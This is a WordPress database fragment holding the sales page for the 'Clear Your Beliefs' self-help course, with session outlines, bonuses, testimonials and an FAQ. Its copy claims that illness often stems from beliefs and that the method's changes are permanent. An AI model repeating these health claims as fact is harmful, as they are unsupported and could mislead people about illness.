href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n<p>	<strong>=&gt; <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<strong>=&gt; <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n<strong>=&gt; <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n<strong>=&gt; <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n<strong>=&gt; <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n<strong>=&gt; <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>=&gt; <em>Professional Coaching Sessions:</strong> </em> Optional.</p>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-07-08 09:17:43', '2015-07-08 14:17:43', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2224, 2, '2015-07-08 09:15:23', '2015-07-08 14:15:23', '&nbsp;\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<strong>Your "limitations" are created by your beliefs.\r\nLearn to change your beliefs, and your limitations will disappear.\r\nYour possibilities will then become unlimited.</strong>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<p>&nbsp;</p>\r\n\r\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\r\n\r\nRelease pain and hurts from the past\r\nOpen to deeper, more profound love\r\nRecognize your true spiritual nature\r\nBecome more calm and less reactive\r\nRediscover the source of your personal power\r\n\r\nClear whatever stops you from taking action\r\nOpen yourself to new possibilities of success\r\nEliminate blocks and barriers easily\r\nDiscover your true purpose\r\nExpress your true magnificence\r\n\r\n<h2>How and Why It Works So Well</h2>\r\n\r\nBeliefs are the major cause of unhappiness, upsets, and limitations.\r\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\r\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\r\nYou''re in charge – you decide what you want to believe, and how far you want to go.\r\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\r\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\r\n\r\n<p>&nbsp;</p>\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\r\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\r\n<h1><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-150x150.png" alt="clear your beliefs ebook" width="150" height="150" class="alignleft size-thumbnail wp-image-1476" /></a>\r\n<a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\r\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n&nbsp;</p>\r\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\r\n<p>&nbsp;</p>\r\n<h1>Why Does This Happen?</h1>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\r\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\r\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\r\n<p>&nbsp;</p>\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\r\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\r\n<p><strong>We literally create our reality with our beliefs.</strong></p>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\r\n<p>&nbsp;</p>\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\r\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\r\n\r\n<strong><em>I''m not enough.</em></strong>\r\n<strong><em>I can''t do it.</em></strong>\r\n<strong><em>I''m not worthy.</em></strong>\r\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\r\n<strong><em>I''m all alone.</em></strong>\r\n\r\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\r\n<strong><em>There''s something wrong with me.</em></strong>\r\n<strong><em>I''m fundamentally flawed.</em></strong>\r\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\r\n<strong><em><strong><em>If I speak up, something bad will 